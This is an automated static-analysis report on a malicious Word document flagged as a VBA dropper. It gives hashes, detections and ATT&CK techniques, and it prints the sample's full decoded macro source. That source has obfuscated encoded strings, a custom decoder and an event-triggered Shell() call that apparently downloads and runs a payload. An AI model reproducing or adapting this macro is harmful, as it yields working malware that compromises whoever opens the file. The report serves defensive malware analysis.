Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 66ac51e2c23ae3a1…

MALICIOUS

Office (OLE)

56.0 KB Created: 2018-07-19 09:23:00 Authoring application: Microsoft Office Word First seen: 2019-06-27
MD5: 76392af855e84ba97ace0f20e0730972 SHA-1: 094be8ae13b14c35d8fa01498217e4a40de3af3e SHA-256: 66ac51e2c23ae3a1174519e2185c43644ce9afdc2df62445e7970c0576e982a1
142 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample is a malicious Office document containing VBA macros. A critical heuristic indicates the use of the Shell() function, which is used in the script to execute arbitrary commands. This strongly suggests the document is designed to download and execute a secondary payload, a common dropper behavior.

Heuristics 4

  • ClamAV: Doc.Dropper.Agent-6615692-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6615692-0
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3815 bytes
SHA-256: 2271d4c5c5d1844f51c73d4fab01cf3bae0d71b24d9609f7066c0e457cd3bb41
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub InkPicture1_Resize(a As Long, b As Long, c As Long, d As Long)
fordtrks "poir", ""
End Sub

Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{9D79E22C-05E4-4C00-AF66-1B8025AB5A54}{3EA3E815-E0E8-4B65-8BAC-734229CEF2BE}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Private Sub TextBox2_Change()
Shell UserForm1.TextBox2, 0
End Sub

Private Sub TextBox3_Change()
har = 1
VODARGOLIM
End Sub

Attribute VB_Name = "abupolyp"
Function suntoday(ByRef text, dec, name)
ad = ""
gr = text + ad
If ad = "" Then
text = gr + dec + name
End If
End Function

Function impalasun()
impalasun = "aft"
End Function

Function fordtrks(ByRef text, burefg)
UserForm1.TextBox3 = text
End Function

Attribute VB_Name = "etallitit"
Function noprocth()
bhpjugzi = 7 * Rnd() + 2
ANDREDD333 = ""
For i = 1 To bhpjugzi
n = ""
taylorjan n, 24 * Rnd() + 97
ANDREDD333 = ANDREDD333 + n
Next i
noprocth = ANDREDD333
End Function

Function taylorjan(ByRef param, ter)
param = Chr(ter)
taylorjan = 1
End Function

Function poldie30(text)
decode = ""
For i = 1 To Len(text)
decode = decode + rainbowne(averetaP(Mid(text, i, 1)), 5)
Next i
poldie30 = decode
End Function

Function rainbowne(num, key)
If num - key < 1 Then
rainbowne = Mid(UserForm1.TextBox1, Len(UserForm1.TextBox1) + num - key, 1)
Else
rainbowne = Mid(UserForm1.TextBox1, num - key, 1)
End If
End Function

Function averetaP(yuiuv)
tgirt = UserForm1.TextBox1
lenqt = Len(tgirt)
For i = 1 To lenqt
If yuiuv <> Mid(tgirt, i, 1) Then
yfiui = 1
Else
averetaP = i
End If
Next i
End Function

Attribute VB_Name = "moronman"
Function bilbothx(fr)
If 1 = 2 Then
End If
Select Case fr
Case 1
bilbothx = "/)k5[/5gfuiojxibb5]$gfuiojxibb5]]ls(/pdf(5"
Case 2
bilbothx = "{.jpod(z,5\"
Case "D"
bilbothx = "};{(iu f'ci/p5jajpi)%"
Case "E"
bilbothx = "(ip%ui'/bdi(p}%kfu(bfhkldbi{\"
Case 4
bilbothx = "_$$1p)g1|"
Case 5
bilbothx = "%imi$$}:jphop gof/ijj5$$1p)g1|"
Case 6
bilbothx = "%imi$$:-poa;"
Case 7
bilbothx = "{$$xppg4[[ldjxiojd(jif%/f)[fd%)fd$$}-/hp/x;"
Case 8
bilbothx = "{$$xppg4[[loij(fpmjif%/f)[fd%)fd$$}-$]]535fsp ldbi5 i(/fkd(z5hj/dd5 ldbighpx51p)g1|"
Case "AF"
bilbothx = "%'hp:5jphop gof/ijj5$1p)g1|"
Case "A"
bilbothx = "%'hp$5 ud(kfujpabi5xdkki(]"
End Select
End Function

Attribute VB_Name = "ploddame"
Function VODARGOLIM()
name1 = ""
name1 = noprocth()
name4 = noprocth()

text = ""

name2 = noprocth()

joshua4321 (bilbothx(1))
suntoday text, UserForm1.TextBox4, name1
name3 = noprocth()
joshua4321 (bilbothx(2))
suntoday text, UserForm1.TextBox4, name2
joshua4321 (bilbothx("D"))
suntoday text, UserForm1.TextBox4, ""
joshua4321 (bilbothx("E"))
suntoday text, UserForm1.TextBox4, name2

joshua4321 (bilbothx(4))
suntoday text, UserForm1.TextBox4, name3
joshua4321 (bilbothx(5))
suntoday text, UserForm1.TextBox4, name3
joshua4321 (bilbothx(6))
suntoday text, UserForm1.TextBox4, name1
joshua4321 (bilbothx(7))
suntoday text, UserForm1.TextBox4, name1
joshua4321 (bilbothx(8))
suntoday text, UserForm1.TextBox4, name4
joshua4321 (bilbothx("AF"))
suntoday text, UserForm1.TextBox4, name4
joshua4321 (bilbothx("A"))
suntoday text, UserForm1.TextBox4, ""

UserForm1.TextBox2 = text
End Function

Function joshua4321(text)
UserForm1.TextBox4 = poldie30(text)
End Function